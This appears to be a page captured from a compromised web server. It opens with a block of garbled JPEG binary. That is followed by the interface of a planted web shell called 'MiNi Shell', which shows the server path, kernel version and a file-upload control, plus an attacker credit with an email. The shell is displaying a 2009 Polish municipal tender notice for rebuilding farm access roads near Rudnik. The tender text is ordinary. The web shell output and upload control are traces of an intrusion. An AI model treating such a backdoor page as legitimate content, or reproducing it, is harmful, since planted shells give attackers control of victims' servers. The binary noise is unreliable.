JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090807/271182-N-2009.html

<p class="kh_header"><b>Rudnik: ZP.341-10/2009
Modernizacja drogi dojazdowej do gruntów  rolnych Ponięcice - Błażejowice i Ponięcice - Sławików</b><br>
<b>Numer ogłoszenia: 271182 - 2009; data zamieszczenia: 07.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Rudnik , ul. Kozielska 1, 47-411 Rudnik, woj. śląskie, tel. 032 4106428, faks 032 4106418 wew. 123.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina-rudnik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP.341-10/2009
Modernizacja drogi dojazdowej do gruntów  rolnych Ponięcice - Błażejowice i Ponięcice - Sławików.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Ponięcice - Błażejowice i Ponięcice - Sławików. 
Pierwsza z nich (Ponięcice - Błażejowice)  o nawierzchni bitumicznej długość 1,33 km, szer. 	3,0m  na przedłużeniu ul. Łąkowej od byłego sklepu do granicy województwa. Druga ( Ponięcice - Sławików)  o 	nawierzchni z płyt betonowych pozyskanych z rozbiórki pierwszej drogi, szer 3,0m i długości do 400m w zależności od ilości 	pozyskanych płyt początek odcinka od końca nawierzchni z płyt drogowych ul. Łąkowej w kierunku 	Sławikowa.
Szczegółowy opis przedmiotu zamówienia zawierają:
a) 2 przedmiary robót( w tym 1 przedmiar dot. drogi Ponięcice - Błażejowice,Ponięcice - Sławików) które stanowią Załącznik nr 6 do niniejszej SIWZ., 
b) 2 specyfikacje techniczne wykonania i odbioru robót budowlanych( w tym 1 specyfikacja techniczna dot. drogi  Ponięcice - Błażejowice,2 -Ponięcice - Sławików w części zawierającej zbiory wymagań w zakresie sposobu wykonania robót budowlanych obejmujące wymagania w zakresie właściwości materiałów, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót, która stanowi Załącznik nr 7 do niniejszej SIWZ,
c) 2 Dokumentacje projektowe (w tym 1 dokumentacja dot. drogi  Ponięcice - Błażejowice, 2-Ponięcice - Sławików  dla których nie jest wymagane uzyskanie pozwolenia na budowę , które stanowią Załącznik nr 8 do niniejszej SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.23-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział wykonawcy niewykluczeni na podstawie art. 24 ust. 1i 2, 	spełniający wymogi art. 22 ust.1 ustawy Prawo zamówień publicznych oraz spełniający 	warunki dodatkowe zawarte w SIWZ.	
	
 5.1Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli 	ustawy nakładają obowiązek posiadania takich uprawnień;

5.2Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia.

W szczególności  zostanie ocenione według poniższych zasad:
WARUNEK 1 
a) wykonali co najmniej 2 roboty  budowlane o porównywalnym zakresie 	rzeczowym  polegającym   na :
położeniu nawierzchni asfaltowej  na powierzchni  co najmniej 1000 m2 każda 
i wykonaniu podbudowy z tłucznia na powierzchni co najmniej 500 m2 każda 

Warunek  2
b)przedstawią dokumenty (referencje) w ilości min. 2 od poprzednich 	zamawiających, potwierdzające, że roboty o których mowa w pkt.5.2 lit a zostały wykonane należycie.
WARUNEK  3
c)dysponują lub przedstawią pisemne zobowiązania innych podmiotów do 	udostępnienia co najmniej   1 osoby posiadającej uprawnienia budowlane  do 	kierowania robotami budowlanymi w specjalności drogowej  wydanych przez organ 	samorządu zawodowego na podstawie art.12a oraz art.14 ustawy z dnia 7 lipca 1994r Prawo budowlane (tj. Dz. U. z 2006 , Nr 156 poz.1118z późń. zm. lub 	odpowiadające im ważne uprawnienia budowlane, które zostały wydane na 	podstawie wcześniej obowiązujących przepisów.	
5.3 Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 	zamówienia i nie podlegają wykluczeniu z postępowania na podstawie art. 22 i art. 24 ustawy.
WARUNEK  4
a)przedłożą oświadczenie stanowiące załącznik nr 2 do SIWZ
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu, na podstawie dokumentów załączonych do oferty poprzez zastosowanie kryterium spełnia/nie spełnia tj. zgodnie z zasadą czy dokumenty wymagane w rozdz. VI zostały załączone do oferty i czy spełniają określone wymagania z rozdz. V. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił.
W przypadku złożenia oferty wspólnej przez 2 lub więcej wykonawców ich wiedza i doświadczenie oraz dysponowanie osobami zdolnymi do wykonania niniejszego zamówienia będzie oceniana wspólnie.
Niespełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem wykonawcy z postępowania na podstawie art. 24 ust.2 pkt.3 ustawy Prawa zamówień publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie Wykonawcy o spełnieniu warunków art. 22 i art.24 ustawy Prawo 	zamówień Publicznych wg wzoru stanowiącego Załącznik nr 2 do niniejszej 	SIWZ).

2.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 	ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 	rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie 	wcześniej niż sześć miesięcy przed upływem terminu składania ofert.
	  	
		
3.Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego 	,potwierdzające, że Wykonawca nie zalega z opłaceniem podatków,lub 	zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub 	rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania 	decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.


4.Aktualne zaświadczenie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy 	Rolniczego Ubezpieczeń Rolniczego Ubezpieczenia Społecznego  	potwierdzające,że Wykonawca nie  zalega z opłaceniem opłat oraz składek na 	ubezpieczenie zdrowotne i społeczne lub zaświadczenie ,że uzyskał przewidziane prawem zwolnienie , odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

W celu potwierdzenia spełnienia  warunku posiadania przez Wykonawcę 			niezbędnej wiedzy i doświadczenia oraz dysponowania osobami zdolnymi 		do wykonania zamówienia do oferty dołączyć należy: 

5.Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania, według wzoru stanowiącego Załącznik nr 4 do niniejszej specyfikacji. Do wykazu Wykonawca zobowiązany jest  jest dołączyć dokumenty  potwierdzające że roboty te zostały wykonane należycie( referencje, protokoły odbioru)  i  spełniają warunki wymagane przez Zamawiającego, o których mowa w SIWZ rozdz. V pkt. 5.2 lit. a i b.

6. Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności według wzoru stanowiącego Załącznik nr 3 do niniejszej specyfikacji. Do wykazu  należy dołączyć potwierdzoną kserokopię uprawnień budowlanych osoby, która będzie kierowała robotami w specjalności drogowej o których mowa w SIWZ rozdz. V pkt.5.2 litc...</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gmina-rudnik.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rudnik ul.Kozielska 1, 47 - 411 Rudnik, lub w siedzibie Urzędu Gminy pokój nr 7 lub pobrać drogą elektroniczną ze strony internetowej  www.gmina- rudnik.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.08.2009 godzina 10:00, miejsce: Urząd Gminy Rudnik ul.Kozielska 1.Ofertę należy złożyć w sekretariacie Urzędu Gminy Rudnik.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane z środków Funduszu Ochrony Gruntów Rolnych

Creat By MiNi SheLL
Email: jattceo@gmail.com